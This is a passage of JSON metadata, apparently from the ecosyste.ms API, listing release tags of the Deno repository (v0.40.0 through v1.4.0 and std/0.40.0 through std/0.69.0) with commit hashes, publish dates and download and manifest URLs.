ags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v